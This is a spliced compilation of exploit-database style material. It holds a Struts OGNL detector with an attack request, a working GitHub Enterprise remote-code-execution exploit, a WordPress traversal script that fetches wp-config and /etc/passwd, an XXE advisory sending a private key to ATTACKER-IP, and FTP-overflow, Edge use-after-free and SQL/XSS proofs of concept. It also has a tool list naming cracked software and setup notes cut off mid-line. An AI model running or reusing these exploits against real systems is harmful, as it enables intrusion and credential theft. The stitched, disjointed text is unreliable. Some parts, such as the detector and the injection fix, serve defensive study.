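    "member_access_bypass": re.compile(r"#_memberAccess|@ognl\.OgnlContext@DEFAULT_MEMBER_ACCESS"),
    "xwork_context": re.compile(r"#context\[['\"]com\.opensymphony\.xwork2\."),
    "code_execution": re.compile(r"java\.lang\.ProcessBuilder|@java\.lang\.Runtime@|@java\.lang\.System@"),
}


def parse_headers(raw: str) -> Dict[str, str]:
    """Turn a raw HTTP header block into a lower-cased name -> value dict (last value wins)."""
    headers = {}
    for line in raw.split("\r\n")[1:]:          # [0] is the request line
        if not line or ":" not in line:
            continue
        name, value = line.split(":", 1)
        headers[name.strip().lower()] = value.strip()
    return headers


def assess_content_type(value: str) -> List[str]:
    """Names of the indicators matched by a Content-Type value, in definition order."""
    return [name for name, rx in INDICATORS.items() if rx.search(value)]


def is_s2045_attempt(raw_request: str) -> bool:
    """True when Content-Type carries an OGNL expression plus at least one Struts-specific
    marker. Requiring the second hit keeps scanners that merely send braces out of the
    high-confidence alert while still logging the expression indicator on its own."""
    hits = assess_content_type(parse_headers(raw_request).get("content-type", ""))
    return "ognl_expression" in hits and len(hits) >= 2


# Constructed sample requests.
ATTACK_REQUEST = (
    "GET /struts2-showcase/ HTTP/1.1\r\n"
    "Host: victim.example\r\n"
    "Content-Type: %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."
    "(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
    "(#context.setMemberAccess(#dm)))).(#os=@java.lang.System@getProperty('os.name'))}\r\n"
    "\r\n"
)
BENIGN_UPLOAD = (
    "POST /struts2-showcase/fileupload/doUpload.action HTTP/1.1\r\n"
    "Host: victim.example\r\n"
    "Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW\r\n"
    "\r\n"
)
BRACE_NOISE = "GET / HTTP/1.1\r\nContent-Type: text/plain; charset=${x}\r\n\r\n"

if __name__ == "__main__":
    for label, req in [("attack", ATTACK_REQUEST), ("upload", BENIGN_UPLOAD), ("noise", BRACE_NOISE)]:
        ct = parse_headers(req).get("content-type", "")
        print(f"{label:7s} alert={is_s2045_attempt(req)} indicators={assess_content_type(ct)}")
```

The same regexes apply unchanged to a reverse-proxy or WAF rule on the Content-Type header; the lower-casing in `parse_headers` matters because header names are case-insensitive and the module can send them in any case. A real multipart upload (second sample) produces no hits at all.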
# Date: 15-03-2017
# Author: Hossein Lotfi (https://twitter.com/hosselot)
# CVE: CVE-2016-7274
1. Description
An integer overflow error within the "LoadUvsTable()" function of usp10.dll
can be exploited to cause a heap-based buffer overflow. Full analysis is
available at:
http://blogs.flexerasoftware.com/secunia-research/2016/12/microsoft_windows_loaduvstable_heap_based_buffer_overflow_vulnerability.html
2. Proof of Concept
open “C:\Windows\Fonts\phagspa.ttf” in a hex editor and change the value at
offset 0x2051 from 0x00000006 to 0x33333334.
3. Solution:
Microsoft initially tried to fix the issue in MS16-147, but the fix was
incomplete and the issue remained unpatched until Microsoft's March 2017 patch
release:
https://twitter.com/hosselot/status/809059287037251584
It appears MS17-013 finally fixed the vulnerability properly:
https://technet.microsoft.com/en-us/library/security/ms17-013.aspx
@hosselot
#!/usr/bin/ruby
require "openssl"
require "cgi"
require "net/http"
require "uri"
SECRET = "641dd6454584ddabfed6342cc66281fb"
puts ' ___. .__ '
puts ' ____ ___ ________ \_ |__ | | __ __ ____ '
puts '_/ __ \\\\ \/ /\__ \ | __ \| | | | \_/ __ \ '
puts '\ ___/ > < / __ \| \_\ \ |_| | /\ ___/ '
puts ' \___ >__/\_ \(____ /___ /____/____/ \___ >'
puts ' \/ \/ \/ \/ \/ '
puts ''
puts "github Enterprise RCE exploit"
puts "Vulnerable: 2.8.0 - 2.8.6"
puts "(C) 2017 iblue <iblue@exablue.de>"
unless ARGV[0] && ARGV[1]
  puts "Usage: ./exploit.rb <hostname> <valid ruby code>"
  puts ""
  puts "Example: ./exploit.rb ghe.example.org \"%x(id > /tmp/pwned)\""
  exit 1
end

hostname = ARGV[0]
code = ARGV[1]

# First we get the cookie from the host to check if the instance is vulnerable.
puts "[+] Checking if #{hostname} is vulnerable..."
http = Net::HTTP.new(hostname, 8443)
http.use_ssl = true
http.verify_mode = OpenSSL::SSL::VERIFY_NONE # We may deal with self-signed certificates

rqst = Net::HTTP::Get.new("/")
while res = http.request(rqst)
  case res
  when Net::HTTPRedirection then
    puts " => Following redirect to #{res["location"]}..."
    rqst = Net::HTTP::Get.new(res["location"])
  else
    break
  end
end

def not_vulnerable
  puts " => Host is not vulnerable"
  exit 1
end

unless res['Set-Cookie'] =~ /\A_gh_manage/
  not_vulnerable
end

# Parse the cookie
begin
  value = res['Set-Cookie'].split("=", 2)[1]
  data = CGI.unescape(value.split("--").first)
  hmac = value.split("--").last.split(";", 2).first
  expected_hmac = OpenSSL::HMAC.hexdigest(OpenSSL::Digest::SHA1.new, SECRET, data)
  not_vulnerable if expected_hmac != hmac
rescue
  not_vulnerable
end
puts " => Host is vulnerable"

# Now construct the cookie
puts "[+] Assembling magic cookie..."

# Stubs, since we don't want to execute the code locally.
module Erubis;class Eruby;end;end
module ActiveSupport;module Deprecation;class DeprecatedInstanceVariableProxy;end;end;end

erubis = Erubis::Eruby.allocate
erubis.instance_variable_set :@src, "#{code}; 1"
proxy = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.allocate
proxy.instance_variable_set :@instance, erubis
proxy.instance_variable_set :@method, :result
proxy.instance_variable_set :@var, "@result"
session = {"session_id" => "", "exploit" => proxy}

# Marshal session
dump = [Marshal.dump(session)].pack("m")
hmac = OpenSSL::HMAC.hexdigest(OpenSSL::Digest::SHA1.new, SECRET, dump)

puts "[+] Sending cookie..."
rqst = Net::HTTP::Get.new("/")
rqst['Cookie'] = "_gh_manage=#{CGI.escape("#{dump}--#{hmac}")}"
res = http.request(rqst)

if res.code == "302"
  puts " => Code executed."
else
  puts " => Something went wrong."
end
# Exploit Title: IPS Community Suite - Steam Profile Integration 2.0.11 and below SQL injection
# Google Dork: inurl:tab=node_steam_steamprofile
# Date: 13/03/2017
# Exploit Author: DrWhat
# Vendor Homepage: https://invisionpower.com/files/file/8170-steam-profile-integration/
# Software Link: https://invisionpower.com/files/file/8170-steam-profile-integration/
# Version: 2.0.11 and below
# Tested on: Windows Server 2008 PHP7 & Linux Debian PHP 5.6
# SQL Injection/Exploit: http://localhost/path/index.php?app=steam&module=steam&section=steamProfile&do=update&id=[USER_WITH_STEAM]%' OR EXTRACTVALUE(1001,CONCAT(0x3A,([QUERY]),0x3A)) AND '%'='&csrfKey=[CSRF_KEY]
# Vulnerable code: /sources/Update/Update.php updateProfile() function
# 532: $ids = array();
# 533: $steamids = '';
# 534: $select = "s.st_member_id,s.st_steamid,s.st_restricted";
# 535: $where = "s.st_steamid>0 AND s.st_restricted!='1'";
# 536: if($single)
# 537: {
# 538: $where .= " AND s.st_member_id='{$single}'"; // $single is $_GET['id'] pass through the router
# 539:
# 540: /* Is the member already in the database ? */
# 541: $s = \IPS\steam\Profile::load($single); // IPS Profile model cleans the request and successfully executes the query
# 573: $query = \IPS\Db::i()->select( $select, array('steam_profiles', 's'), $where, 's.st_member_id ASC', array( $this->extras['profile_offset'], 100), NULL, NULL, '011'); // Our payload is then later executed in the $where variable unsanitized
# Timeline
# 13/03/2017: Exploit discovered
# 13/03/2017: Vendor notified
# 14/03/2017: Vendor confirmed vulnerability
# 15/03/2017: Vendor releases patch 2.0.12
# 15/03/2017: Public disclosure
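The vulnerable line quoted above splices `$single` straight into `$where` with string interpolation, so the member id becomes part of the SQL grammar rather than a value. As an added example (my code, not the plugin's, with sqlite3 standing in for MySQL and a constructed table and tautology payload rather than the advisory's MySQL-only EXTRACTVALUE query), the following shows the concatenated form beside the parameterized fix and how each treats the same input.

```python
import sqlite3

# sqlite3 stands in for MySQL; the columns mirror the advisory's steam_profiles table.
SCHEMA = """
CREATE TABLE steam_profiles (
    st_member_id  INTEGER PRIMARY KEY,
    st_steamid    INTEGER NOT NULL,
    st_restricted TEXT    NOT NULL DEFAULT '0'
);
"""
# Constructed rows: member 2 is restricted, member 3 has no Steam ID linked.
ROWS = [(1, 76561198000000001, '0'), (2, 76561198000000002, '1'), (3, 0, '0')]
SELECT = "SELECT s.st_member_id, s.st_steamid, s.st_restricted FROM steam_profiles s WHERE "


def open_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    conn.executemany("INSERT INTO steam_profiles VALUES (?, ?, ?)", ROWS)
    return conn


def lookup_unsafe(conn: sqlite3.Connection, single: str):
    """Mirrors updateProfile(): the id is spliced into $where by string interpolation."""
    where = "s.st_steamid>0 AND s.st_restricted!='1'"
    where += f" AND s.st_member_id='{single}'"          # injection point
    return conn.execute(SELECT + where + " ORDER BY s.st_member_id").fetchall()


def lookup_safe(conn: sqlite3.Connection, single: str):
    """Same query with the id bound as a parameter: the value can never alter the WHERE."""
    where = "s.st_steamid>0 AND s.st_restricted!='1' AND s.st_member_id=?"
    return conn.execute(SELECT + where + " ORDER BY s.st_member_id", (single,)).fetchall()


# A constructed tautology, not the advisory's payload. Because AND binds tighter than
# OR, the unsafe WHERE becomes (...) OR '1'='1' and every row comes back, the
# restricted and unlinked ones included.
PAYLOAD = "1' OR '1'='1"

if __name__ == "__main__":
    db = open_db()
    print("unsafe, normal id:", lookup_unsafe(db, "1"))
    print("unsafe, payload  :", lookup_unsafe(db, PAYLOAD))   # all three rows
    print("safe,   payload  :", lookup_safe(db, PAYLOAD))     # no rows
```

The parameterized version also preserves the `st_restricted!='1'` filter that the injected OR silently switches off, which is why the advisory's payload can reach data the `Profile::load()` check was meant to keep out.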
Scanning
Nessus (Home version)
OpenVAS (install OpenVAS on Kali and watch for a hung agent; otherwise it becomes very slow and reports errors)
AWVS (cracked version - 52pojie)
AppScan (cracked version)
Burp Suite Pro (cracked version)
MobSF (the mobile app client supports iOS but must run on a Mac)
Nmap/ZMap/Masscan port scanning
Vulnerability management
Insight
smef
fuxi
DefectDojo
電気チューブ
Jira
ZenTao
SRC platforms
SRCMS
laravel-src
Asset management / automated operations and maintenance
Xunfeng
AssetsView
BlueKing (Blue Whale) BK-CMDB
OpsManage
Ansible
SaltStack
SOC
SOSRP
W3A_SOC
OpenSOC
OSSIM
Intrusion detection / security monitoring / traffic backtracking
Suricata (SELKS)
Bro
OSSEC (Wazuh)
Security Onion
OwlH
NethServer
Snort
openwips-ng
Moloch
Tongcheng-dragon
CloudWalker (Mu Yun) only open-sources the WebShell check-and-kill part
osquery
Web application security
ngx_lua_waf
OpenStar
ModSecurity
OpenWAF
OpenRASP
x-waf
jxwaf
Centralized endpoint security management
360 Enterprise Edition
Turf Security
Bastion hosts
JumpServer
Teleport
Code quality management / code audit
Sonar + Jenkins
Cobra
VCG
Fortify (cracked version; the latest rule set found is 2018.3)
RIPS / Seay source code audit system (PHP)
FindBugs (Java)
Web log audit
360 Star Map
xlog
Lorg
Log analysis systems
ELK (ES + Logstash + Kibana)
Kibana_hanization (Chinese version of Kibana)
Online behaviour management / access control / authentication
PacketFence
iKuai
OpenLDAP
Central Authentication Service (CAS)
Data leak prevention
OpenDLP
Baseline check / hardening
CIS
Lynis audit
Winspect
OpenSCAP
GitHub leak scanning
x-patrol
Hawkeye
gsil
vksrc/github-monitor
Directory index systems / personal network disk / file sharing
ZDIR
NextCloud
Seafile Community Edition
ownCloud
OnionShare
Pydio Cells
Honeypots
opencanary_web
T-Pot
MHN
Phishing
P神's phishing
mail_fishing
Black Key
Gophish
API gateways
goku-api-gateway
Kong
Others
Webrange (Docker management platform)
App-Host (intranet app release)
Adbackbox
osquery
php-sso
Scout (URL monitoring platform)
jxotp (SSH login with two-factor authentication)
DOClever
Lynis audit
Archer
Walle-Web (code deployment platform)
Apollo (configuration center)
Open-source Muyun CloudWalker (WebShell detection part only)
Nebula (星雲) business risk control system
Meituan DBProxy database firewall
rkhunter/chkrootkit under Linux
PCHunter / Turf Sword / PowerTool / Process Explorer / Process Hacker / Autoruns / OTL
Kaspersky
FastIR_Collector_Win forensics
FastIR_Collector_Linux forensics
D Shield WebShell check-and-kill
Sandboxie personal sandbox
ClamAV
# Exploit Title: Stored Cross Site Scripting (XSS) in Sitecore Experience Platform 8.1 Update-3
# Date: March 15, 2017
# Exploit Author: Pralhad Chaskar
# Vendor Homepage: http://www.sitecore.net/en
# Version: 8.1 rev. 160519
# Tested on: Sitecore Experience Platform 8.1 Update-3 i.e.; 8.1 rev. 160519
# CVE : CVE-2016-8855
Vendor Description
------------------
Sitecore CMS makes it effortless to create content and experience rich websites that help you achieve your business goals such as increasing sales and search engine visibility, while being straight-forward to integrate and administer. Sitecore lets you deliver sites that are highly scalable, robust and secure. Whether you're focused on marketing, development and design, or providing site content, Sitecore delivers for you.
Description
------------
Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted web sites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user.
Vulnerability Class
--------------------
Cross-site Scripting (XSS) - https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
Proof of Concept
----------------
The Name and Description input fields aren't properly escaped. This could lead to an XSS attack that could affect administrators, users and editors.
1. Login to application and navigate to "https://abc.com/sitecore/client/Applications/List Manager/Taskpages/Contact list"
2. Create new Contact List, add the XSS vector in Name and Description parameter using proxy (Burp) and Save the Contact List
3. Navigate Dashboard of List Manager on "https://abc.com/sitecore/shell/sitecore/client/Applications/List Manager/Dashboard" leading to execution of XSS payload.
Vendor Contact Timeline
------------------------
Discovered: October 16, 2016
Vendor Notification: October 18, 2016
Advisory Publication: Mar 15, 2017
Public Disclosure: Mar 15, 2017
Affected Targets
----------------
Sitecore Experience Platform 8.1 Update-3 i.e.; 8.1 rev. 160519
Solution
--------
Upgrade to Sitecore Experience Platform 8.2 Update-2 to fix this issue.
Credits
-------
Pralhad Chaskar
Information Security Analyst
Help AG Middle East
References
----------
[1] Help AG Middle East http://www.helpag.com/
[2] Sitecore Experience Platform https://dev.sitecore.net/Downloads/Sitecore_Experience_Platform.aspx
[+] Credits: John Page AKA hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-DVD-MAKER-XML-EXTERNAL-ENTITY-FILE-DISCLOSURE.txt
[+] ISR: ApparitionSec
Vendor:
=================
www.microsoft.com
Product:
=================
Windows DVD Maker
v6.1.7
Windows DVD Maker is a feature you can use to make DVDs that you can watch on a computer or on a TV using a regular DVD player.
Vulnerability Type:
=============================
XML External Entity Injection
CVE Reference:
==============
CVE-2017-0045
MS17-020
Security issue:
================
Windows DVD Maker Project ".msdvd" files are prone to XML External Entity attacks. A specially crafted malicious .msdvd file lets a remote attacker
read files from the victim's computer, resulting in remote information / file disclosure.
POC URL:
=========
https://vimeo.com/208383182
References:
============
https://technet.microsoft.com/library/security/MS17-020
https://support.microsoft.com/en-us/help/3208223/ms17-020-security-update-for-windows-dvd-maker-march-14-2017
Applies to:
Windows Server 2008 R2 Service Pack 1
Windows Server 2008 R2 Datacenter
Windows Server 2008 R2 Enterprise
Windows Server 2008 R2 Standard
Windows Web Server 2008 R2
Windows Server 2008 R2 Foundation
Windows 7 Service Pack 1
Windows 7 Ultimate
Windows 7 Enterprise
Windows 7 Professional
Windows 7 Home Premium
Windows 7 Home Basic
Windows 7 Starter
Windows Server 2008 Service Pack 2
Windows Server 2008 Foundation
Windows Server 2008 Standard
Windows Server 2008 for Itanium-Based Systems
Windows Web Server 2008
Windows Server 2008 Enterprise
Windows Server 2008 Datacenter
Windows Vista Service Pack 2
Windows Vista Home Basic
Windows Vista Home Premium
Windows Vista Business
Windows Vista Ultimate
Windows Vista Enterprise
Windows Vista Starter
Exploit code(s):
===============
Steal XAMPP Web Servers private key "server.key".
1) python -m SimpleHTTPServer 8080 (listens on ATTACKER-IP, hosts payload.dtd)
2) "payload.dtd"
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://ATTACKER-IP:8080?%file;'>">
%all;
3) "Evil.msdvd"
<?xml version="1.0"?>
<!DOCTYPE NYHC [
<!ENTITY % file SYSTEM "C:\xampp\apache\conf\ssl.key\server.key">
<!ENTITY % dtd SYSTEM "http://ATTACKER-IP:8080/payload.dtd">
%dtd;]>
<pwn>&send;</pwn>
RESULT:
XAMPP Web Server private key sent to attacker:
e.g.
C:\>python -m SimpleHTTPServer 8080
Serving HTTP on 0.0.0.0 port 8080 ...
127.0.0.1 - - [13/Mar/2017 23:53:36] "GET /payload.dtd HTTP/1.1" 200 -
127.0.0.1 - - [13/Mar/2017 23:53:36] "GET /?-----BEGIN%20RSA%20PRIVATE%20KEY-----MIICXQIBAAKBgQDBJdMn4+ytDYNqbedfmnUQI+KQnaBjlY8dQZpY1ZpjjFtzhpB5zMPWo3m4dbwelHx8buOt0CdcC8YMavkPMv6zxHoQIwQrKSjUqvmzL2YQ+KfBzWDEayhX42c7957NSCLcOOpIE4A6QJdXDEc1Rj1xYpruU51jDmd6KMmkNP8Z7QIDAQABAoGBAJvUs58McihQrcVRdIoaqPXjrei1c/DEepnFEw03EpzyYdo8KBZM0Xg7q2KKgsM9U45lPQZTNmY6DYh5SgYsQ3dGvocvwndq+wK+QsWH8ngTYqYqwUBBCaX3kwgknAc++EpRRVmV0dJMdXt3xAUKSXnDP9fLPdKXffJoG7C1HHVVAkEA+087rR2FLCjdRq/9WhIT/p2U0RRQnMJyQ74chIJSbeyXg8E
ll5QxhSg7skrHSZ0cBPhyaLNDIZkn3NMnK2UqhwJBAMTAsUorHNo4dGpO8y2HE6QXxeuX05OhjiO8H2hmkcuMi2C9OwGIrI+lx1Q8mK261NKJh7sSVwQikh5YQYLKcOsCQQD6YqcChDb7GHvewdmatAhX1ok/Bw6KIPHXrMKdA3s9KkyLaRUbQPtVwBA6Q2brYS1Zhm/3ASQRhZbB3V9ZTSJhAkB772097P5Vr24VcPnZWdbTbG4twwtxWTix5dRa7RY/k55QJ6K9ipw4OBLhSvJZrPBWVm97NUg+wJAOMUXC30ZVAkA6pDgLbxVqkCnNgh2eNzhxQtvEGE4a8yFSUfSktS9UbjAATRYXNv2mAms32aAVKTzgSTapEX9M1OWdk+/yJrJs-----END%20RSA%20PRIVATE%20KEY----- HTTP/1.1" 301 -
127.0.0.1 - - [13/Mar/2017 23:53:37] "GET /?-----BEGIN%20RSA%20PRIVATE%20KEY-----MIICXQIBAAKBgQDBJdMn4+ytDYNqbrdfmnUQI+KQnaBjlY8dQZpY1ZxjjFtzhpB5zMPmo4m4dbwelHx8buOt6CdcC8YMavkPMv6zxHoQIwQrKSjUqvmzL2YQ+KfBzWDEayhX42c7957NSCLcOOpIE4A6QJdXDEc1Rj1xYpruU51jDmd6KMmkNP8Z7QIDAQABAoGBAJvUs58McihQrcVRdIoaqPXjrei1c/DEepnFEw03EpzyYdo8KBZM0Xg7q2KKgsM9U45lPQZTNmY6DYh5SgYsQ3dGvocvwndq+wK+QsWH8ngTYqYqwUBBCaX3kwgknAc++EpRRVmV0dJMdXt3xAUKSXnDP9fLPdKXffJoG7C1HHVVAkEA+087rR2FLCjdRq/9WhIT/p2U0RRQnMJyQ74chIJSbeyXg8E
ll5QxhSg7skrHSZ0cBPhyaLNDIZkn3NMnK2UqhwJBAMTAsUorHNo4dGpO8y2HE6QXxeuX05OhjiO8H2hmmcuMi2C9OwGIrI+lx1Q8mK261NKJh7sSVwQikh3YQYiKcOsCQQD6YqcChDb7GHvewdmatAhX1ok/Bw6KIPHXrMKdA3s9KkyLaRUbQPtVwBA6Q2brYS1Zhm/3ASQRhZbB3V9ZTSJhAkB772097P5Vr24VcPnZWdbTbG4twwtxWTix5dRa7RY/k55QJ6K9ipw4OBLhSvJZrPBWVm97NUg+wJAOMUXC30ZVAkA6pDgLbxVqkCnNgh2eNzhxQtvEGE4a8yFSUfSktS9UbjAATRYXNv2mAms32aAVKTzgSTapEX9M1OWdk+/yJrJs-----END%20RSA%20PRIVATE%20KEY-----/ HTTP/1.1" 200 -
Disclosure Timeline:
=========================================
Vendor Notification: September 3, 2016
Vendor acknowledgement: November 17, 2016
March 14, 2017 : Vendor released MS17-020
March 15, 2017 : Public Disclosure
Network access:
=================
Remote
Severity:
===========
High
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx
[+] Title: Cerberus FTP Server 8.0.10.3 – 'MLST' Remote Buffer Overflow
[+] Credits / Discovery: Nassim Asrir
[+] Author Contact: wassline@gmail.com || https://www.linkedin.com/in/nassim-asrir-b73a57122/
[+] Author Company: Henceforth
[+] CVE: CVE-2017-6880
Vendor:
===============
https://www.cerberusftp.com/
Download:
===========
https://www.cerberusftp.com/files/CerberusInstall.exe (32-Bit)
Vulnerability Type:
===================
Remote Buffer Overflow.
issue:
===================
The crash occurs when an authenticated attacker sends the MLST command with an argument of 2047 "A" characters.
POC:
===================
#Simple POC by Nassim Asrir from Henceforth.
import socket

bad_char = b"A" * 2047                      # 2047-byte MLST argument that triggers the overflow
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.1.81', 21))              # target Cerberus FTP server
s.recv(1024)                                 # banner
s.send(b'USER nassim\r\n')                   # the PoC authenticates first
s.recv(1024)
s.send(b'PASS mypass\r\n')
s.recv(1024)
s.send(b'MLST ' + bad_char + b'\r\n')
s.close()
https://gist.github.com/Nassim-Asrir/a1bb8479976d4bf6b7c0e63024a46cd6/archive/e76274496bf20a0d3ecbb4b2f6a408166808d03b.zip
Tested on:
===============
Windows 7 Sp1 (64 Bit)
import random
import string

import requests
from urllib.parse import urlparse

print("---------------------------------------------------------------------")
print("Wordpress Plugin Membership Simplified v1.58 - Arbitrary File Download\nDiscovery: Larry W. Cashdollar\nExploit Author: Munir Njiru\nWebsite: https://www.alien-within.com\nCVE-2017-1002008\nCWE: 23\n\nReference URLs:\nhttp://www.vapidlabs.com/advisory.php?v=187")
print("---------------------------------------------------------------------")
victim = input("Please Enter victim host e.g. http://example.com: ")
file_choice = input("\n Please choose a number representing the file to attack: \n1. Wordpress Config \n2. Linux Passwd File\n")
if file_choice == "1":
    # "..././" survives a single-pass strip of "../" and collapses back to "../"
    payload = "..././..././..././wp-config.php"
elif file_choice == "2":
    payload = "..././..././..././..././..././..././..././..././etc/passwd"
else:
    print("Invalid Download choice, Please choose 1 or 2; alternatively you can re-code me. I will now exit")
    quit()
slug = "/wp-content/plugins/membership-simplified-for-oap-members-only/download.php?download_file=" + payload
target = victim + slug


def randomizeFile(size=6, chars=string.ascii_uppercase + string.digits):
    # random suffix so repeated runs against one host do not overwrite each other
    return ''.join(random.choice(chars) for _ in range(size))


def checkPlugin():
    pluginExists = requests.get(victim + "/wp-content/plugins/membership-simplified-for-oap-members-only/download.php")
    if pluginExists.status_code == 200:
        print("\nI can reach the target & it seems vulnerable, I will attempt the exploit\nRunning exploit...")
        exploit()
    else:
        print("Target has a funny code & might not be vulnerable, I will now exit\n")
        quit()


def exploit():
    getThatFile = requests.get(target)
    fileState = getThatFile.status_code
    extract_hostname = urlparse(victim).netloc
    cleanName = randomizeFile()
    if fileState == 200:
        respFromThatFile = getThatFile.text
        if file_choice == "1":
            resultFile = extract_hostname + "_config_" + cleanName + ".txt"
            label = "Wordpress Config"
        else:
            resultFile = extract_hostname + "_passwd_" + cleanName + ".txt"
            label = "Passwd File"
        with open(resultFile, 'w') as pwned:
            pwned.write(respFromThatFile)
        print(label + " Written to " + resultFile)
    else:
        print("I am not saying it was me but it was me! Something went wrong when I tried to get the file. The server responded with: \n" + str(fileState))


if __name__ == "__main__":
    checkPlugin()
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1043
Microsoft Edge: Undefined behavior on some getters
I noticed that some javascript getters behave strangely.
My test code:
var whitelist = ["closed", "document", "frames", "length", "location", "opener", "parent", "self", "top", "window"];
var f = document.createElement("iframe");
f.onload = () => {
  f.onload = null;
  for (var x in window) {
    if (whitelist.indexOf(x) != -1)
      continue;
    try {
      window.__lookupGetter__(x).call(f.contentWindow);
      log(x);
    } catch (e) {
    }
  }
};
f.src = "https://abc.xyz/";
document.body.appendChild(f);
And after some playing around, I finally reached a UAF condition. PoC is attached. RIP will jump into the freed JIT code.
Tested on Microsoft Edge 38.14393.0.0.
-->
<pre id="d">
</pre>
<body></body>
<script>
function log(txt) {
  var c = document.createElement("div");
  c.innerText = "log: " + txt;
  d.appendChild(c);
}
function main() {
  var f = document.createElement("iframe");
  f.onload = () => {
    f.onload = () => {
      var status = window.__lookupGetter__("defaultStatus").call(f.contentWindow);
      var func_cons = status.constructor.constructor;
      var ff = func_cons("return 0x12345;");
      for (var i = 0; i < 0x100000; i++)
        ff();
      f.onload = () => {
        alert("get ready");
        ff();
      };
      f.src = "about:blank";
    };
    //a = f.contentWindow;
    f.src = "about:blank";
  };
  document.body.appendChild(f);
}
main();
</script>
1. Xray
Installation and configuration
1. Linux: [root@instance-7q32v011 opt]# wget https://github.com/chaitin/xray/releases/download/0.21.8/xray_linux_amd64.zip
2. Unzip the file: [root@instance-7q32v011 opt]# unzip xray_linux_amd64.zip
3. Run the Xray executable once to generate the certificate and the configuration file
[root@instance-7q32v011 opt]
2. Configuring the push source (sc.ftqq.com)
1. Log in: sign in to the site with a GitHub account to obtain the sckey (shown on the "send message" page)
2. Bind: click "WeChat Push" and scan the QR code to complete the binding
3. Send a message: send a GET request to http://sc.ftqq.com/sckey.send (sckey being the key from step 1) and the message is received in WeChat. Such a GET request looks like: https://sc.ftqq.com/scu100930te4d1
0RWELLL4BS
**********
security advisory
olsa-2015-8258
PGP: 79A6CCC0
@orwelllabs
Advisory Information
====================
- Title: ImagePath Resource Injection/Open script editor
- Vendor: AXIS Communications
- Research and Advisory: Orwelllabs
- Class: Improper Input Validation [CWE-20]
- CVE Name: CVE-2015-8258
- Affected Versions: Firmware versions <lt 5.80.x
- IoT Attack Surface: Device Administrative Interface/Authentication/Authorization
- OWASP IoTTop10: I1, I2
Technical Details
=================
The "imagePath=" parameter (which is prone to XSS in a large range of products) can also be abused for resource injection. If a URL is supplied in this parameter, the page makes a GET request to that URL, so this is an interesting point from which to pull malicious code from the attacker's machine; the possibilities are of course vast (including hooking the browser).
An attacker sends the following URL to the camera's current web user interface:
http://{AXISVULNHOST}/view.shtml?imagepath=http://www.3vilh0st.com/evilcode.html
This request is processed normally and returns status code 200 (OK):
[REQUEST]
GET /view.shtml?imagepath=http://www.3vilh0st.com/evilcode.html HTTP/1.1
Host: {axisvulnhost}
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:41.0) Gecko/20100101
Firefox/41.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Authorization: Digest username="Winst0n", realm="AXIS_XXXXXXXXXXX",
nonce="00978cY6s4g@Sadd1b11a9A6ed955e1b5ce9eb",
uri="/view.shtml?imagepath=http://www.3vilh0st.com/evilcode.html",
response="5xxxxxxxxxxxxxxxxxxxxxx", qop=auth,
nc=0000002b, cnonce="00rw3ll4bs0rw3lll4bs"
Connection: keep-alive
GET /evilcode.html HTTP/1.1
Host: www.3vilh0st.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:41.0) Gecko/20100101
Firefox/41.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://{axisvulnhost}/view.shtml?imagepath=http://www.3vilh0st.com/evilcode.html
Connection: keep-alive
The server response can be seen below, clipped to the affected HTML snippets (just look for "http://www.3vilh0st.com/evilcode.html"):
<table border="0" cellpadding="3" cellspacing="3">
<tr>
<td id="videoStreamTable">
<script language="JavaScript">
<!--
video('http://www.3vilh0st.com/evilcode.html');
// -->
</script>
</td>
</tr>
</table>
[..SNIP..]
function listVideoSources()
{
var formInt = document.listFormInt;
var formExt = document.listFormExt;
var formCrop = document.listFormCrop;
var presetForm = document.listFormPreset;
var form = document.WizardForm
var currentPath = 'http://www.3vilh0st.com/evilcode.html';
var imageSource;
[..SNIP..]
var reload = false;
reload |= (other != null && other.search("seq=yes") >= 0);
reload |= (other != null && other.search("streamprofile=") >= 0);
reload |= ((other == null || (other != null && other.search("streamprofile=
;)(r") == -1)) && ('' != ""));
reload |= (imagePath != 'http://www.3vilh0st.com/evilcode.html');
[..SNIP..]
<script SRC="/incl/activeX.js?id=69"></script>
</head>
<body class="bodyBg" topmargin="0" leftmargin="15" marginwidth="0"
marginheight="0" onLoad="DrawTB('no', 'http://www.3vilh0st.com/evilcode.html',
'1', '0', 'no', 'no', 'true', getStreamProfileNbr());" onResize="">
<script language="JavaScript">
[..SNIP..]
// Draw the scale buttons
var currentResolution = 0
var width = 0
var height = 0
var imagepath = "http://www.3vilh0st.com/evilcode.html"
var resStart = imagepath.indexOf("resolution=")
if (resStart != -1) {
var resStop = imagepath.indexOf("&", resStart)
[..SNIP..]
=================== view.shtml snips =====================
447 function zoom(size)
448 {
449 var url = document.URL;
450
451 if (url.indexOf("?") == -1) {
452 url += "F?size=" + size
453 } else if (url.indexOf("size=") == -1) {
454 url += "&size=" + size
455 } else {
